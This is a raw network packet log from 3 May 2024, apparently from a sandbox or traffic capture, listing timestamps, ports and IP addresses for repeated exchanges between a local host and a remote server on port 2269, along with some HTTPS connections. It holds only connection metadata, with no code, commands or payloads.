May 3, 2024 11:21:06.083156109 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.084415913 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.084503889 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.084546089 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.086199999 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.086289883 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.086335897 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.086395025 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.088219881 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.088268042 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.088279009 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.088316917 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.089133978 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.090887070 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.093064070 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.093116999 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.094832897 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.096831083 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.096883059 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.098799944 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.100146055 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.100194931 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.101958036 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.102420092 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.179069042 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:06.228796005 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:06.384205103 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.386080980 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.386162996 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.406912088 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.407897949 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.407994986 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.504021883 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.506937027 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.510423899 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.577966928 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.582005978 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.582083941 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.583129883 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.584891081 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.584932089 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.585794926 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.587898970 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.587939024 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.634146929 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.634226084 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.634273052 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.634296894 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.634355068 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.634397030 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.635296106 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.635931015 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.635971069 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.644953012 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.653856039 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.653908968 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.658230066 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.711791992 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.845022917 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.866921902 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.866991997 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.868016005 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.876868963 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.876928091 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.930886984 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.932915926 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.932960987 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.935914040 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.937841892 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.937881947 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.938851118 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.941823959 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.941864014 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.943079948 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.946845055 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.946902037 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.949882984 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.952610016 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.952660084 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.964881897 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.964924097 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.964970112 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.977135897 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.979082108 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.979135990 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.982034922 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.985097885 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.985140085 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.987869024 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.997951984 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.997996092 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.998006105 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.998073101 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.998110056 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.998147011 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.999372005 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:06.999412060 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:06.999433041 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.001708031 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.001760006 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.004605055 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.007276058 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.007318974 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.008724928 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.012653112 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.012692928 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.296379089 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.296418905 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.296916962 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.296953917 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.297003031 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.297068119 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.297461033 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.297477961 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.297920942 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.298067093 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.298177004 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.333286047 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.338896036 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.338943958 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.344111919 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.363945007 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.373002052 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.373055935 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.395057917 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.395106077 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.395158052 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.395169020 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.395184040 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.395222902 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.395236015 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.395255089 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.395294905 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.483589888 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:07.552194118 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.555201054 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.555258989 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.567234039 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:07.586946011 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.589932919 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.589988947 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.614840984 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.615309000 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.615360975 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.615387917 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.622247934 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.622303009 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.667918921 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.671715975 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.671767950 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.673032999 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.674854994 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.674926043 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.676781893 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.678873062 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.678910017 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.709089994 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.709189892 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.709237099 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.709287882 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.745073080 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.745174885 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.929212093 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.929244041 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.929308891 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.936180115 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.937928915 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.937999010 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.972307920 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.972337961 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.972374916 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.972403049 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.972870111 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.972910881 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.984976053 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.986052036 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.986093998 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.986840963 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.986912012 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.986953020 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.987963915 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.992863894 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:07.992917061 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:07.993016958 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.016360044 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.016441107 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.024139881 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.026001930 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.026051044 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.027071953 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.027089119 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.027143002 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.027791977 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.029438019 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.029479027 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.038072109 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.038176060 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.038188934 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.038223982 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.038243055 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.038283110 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.039493084 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.039508104 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.039552927 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.039617062 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.042871952 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.042929888 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.043814898 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.044869900 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.044919968 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.046843052 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.048084021 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.048146963 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.380911112 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.380940914 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.381092072 CEST	49722	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.381131887 CEST	443	49722	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.381525040 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.382520914 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.382605076 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.383037090 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.424122095 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.478637934 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.478684902 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.478733063 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.478745937 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.478775978 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.478817940 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.478827000 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.478837967 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.478888988 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.553673983 CEST	49723	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:08.553709984 CEST	443	49723	142.251.41.4	192.168.2.5
May 3, 2024 11:21:08.718765020 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.720612049 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.720658064 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.728590965 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.734087944 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.734128952 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.734374046 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.734390020 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.734426975 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.734513998 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.734648943 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.734689951 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.737392902 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.737533092 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.737577915 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.740876913 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.742857933 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.742897034 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.743813038 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.744874001 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.744918108 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.747072935 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.750149965 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.750193119 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.751966000 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.756040096 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.756082058 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.760938883 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.762923956 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.762969971 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.767982960 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.773086071 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.773128986 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.773924112 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.784127951 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.784188032 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.784199953 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.784286976 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.784332991 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.784805059 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.811916113 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.812002897 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:08.812776089 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:08.864598036 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:10.368056059 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:10.368132114 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:11.660579920 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:11.660633087 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:11.660708904 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:11.661042929 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:11.661067963 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:11.847100973 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:11.991040945 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:11.991072893 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:11.991661072 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:11.997348070 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:11.997492075 CEST	443	49724	142.251.41.4	192.168.2.5
May 3, 2024 11:21:12.065884113 CEST	49724	443	192.168.2.5	142.251.41.4
May 3, 2024 11:21:12.977921963 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:12.977961063 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:12.978142023 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:12.979984999 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:12.979999065 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:13.201601028 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:13.372257948 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:13.372410059 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:13.375282049 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:13.375297070 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:13.375559092 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:13.446846962 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:13.599044085 CEST	49703	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:13.599870920 CEST	49703	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:13.600193977 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:13.600234985 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:13.600306034 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:13.601349115 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:13.601363897 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:13.754194975 CEST	443	49703	23.1.237.91	192.168.2.5
May 3, 2024 11:21:13.755179882 CEST	443	49703	23.1.237.91	192.168.2.5
May 3, 2024 11:21:13.807621002 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:13.852122068 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:13.919795036 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:13.919879913 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:14.031436920 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:14.053886890 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:14.053919077 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:14.054358959 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:14.054418087 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:14.056245089 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:14.056279898 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:14.056533098 CEST	49729	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:14.056540012 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:14.061892986 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.061942101 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.061952114 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.061975956 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.061999083 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.062000990 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:14.062009096 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.062021017 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.062042952 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:14.062068939 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:14.062088013 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:14.062195063 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.062247038 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:14.062258959 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.062299013 CEST	443	49726	52.165.165.26	192.168.2.5
May 3, 2024 11:21:14.062349081 CEST	49726	443	192.168.2.5	52.165.165.26
May 3, 2024 11:21:14.291841984 CEST	443	49729	23.1.237.91	192.168.2.5
May 3, 2024 11:21:14.292540073 CEST	49729	443	192.168.2.5	23.1.237.91
